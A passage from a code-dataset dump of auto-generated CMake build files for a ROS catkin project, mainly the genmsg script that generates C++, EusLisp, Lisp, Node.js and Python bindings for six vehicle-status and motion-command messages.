"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/BreakStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/SteerStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/ThrottleGearStatus.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/MotionCmd.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/CanInfo.lisp\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/common-lisp/ros/zfmsg/msg/CanInfoAW.lisp\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_lisp.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7786259651184082,
"alphanum_fraction": 0.7786259651184082,
"avg_line_length": 31.75,
"blob_id": "6bcc01a1084d7632f80979e55e6d002b971c9865",
"content_id": "5e72667287f189f5b7a2fc26c72c7df625032902",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 4,
"path": "/devel/share/path/cmake/path-msg-paths.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-msg-paths.cmake.develspace.in\n\nset(path_MSG_INCLUDE_DIRS \"\")\nset(path_MSG_DEPENDENCIES std_msgs)\n"
},
{
"alpha_fraction": 0.7525020837783813,
"alphanum_fraction": 0.7662519812583923,
"avg_line_length": 44.01473617553711,
"blob_id": "b1afa0bdb6ce0d4f20ee987206e8b0dc43e7804d",
"content_id": "50c16fe5dfdd1b95606fcd6823a24393e076118e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 21382,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 475,
"path": "/build/zfmsg/cmake/zfmsg-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(STATUS \"zfmsg: 6 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Izfmsg:/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg;-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(zfmsg_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" \"std_msgs/Header\"\n)\n\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_custom_target(_zfmsg_generate_messages_check_deps_${_filename}\n COMMAND ${CATKIN_ENV} ${PYTHON_EXECUTABLE} ${GENMSG_CHECK_DEPS_SCRIPT} \"zfmsg\" \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" \"std_msgs/Header\"\n)\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_cpp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_cpp _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_gencpp)\nadd_dependencies(zfmsg_gencpp zfmsg_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n_generate_msg_eus(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_eus _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_geneus)\nadd_dependencies(zfmsg_geneus zfmsg_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n_generate_msg_lisp(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_lisp _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_genlisp)\nadd_dependencies(zfmsg_genlisp zfmsg_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n_generate_msg_nodejs(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_nodejs _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_gennodejs)\nadd_dependencies(zfmsg_gennodejs zfmsg_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n_generate_msg_py(zfmsg\n \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\"\n \"${MSG_I_FLAGS}\"\n \"/opt/ros/kinetic/share/std_msgs/cmake/../msg/Header.msg\"\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n)\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(zfmsg\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(zfmsg_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(zfmsg_generate_messages zfmsg_generate_messages_py)\n\n# add dependencies to all check dependencies targets\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/BreakStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/SteerStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/ThrottleGearStatus.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/MotionCmd.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfo.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\nget_filename_component(_filename \"/home/zf/xuechong_ws/zhuifengShow0919/src/zfmsg/msg/CanInfoAW.msg\" NAME_WE)\nadd_dependencies(zfmsg_generate_messages_py _zfmsg_generate_messages_check_deps_${_filename})\n\n# target for backward compatibility\nadd_custom_target(zfmsg_genpy)\nadd_dependencies(zfmsg_genpy zfmsg_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS zfmsg_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/zfmsg\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(zfmsg_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/zfmsg\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(zfmsg_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/zfmsg\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(zfmsg_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(zfmsg_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(zfmsg_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
{
"alpha_fraction": 0.761457085609436,
"alphanum_fraction": 0.794359564781189,
"avg_line_length": 55.733333587646484,
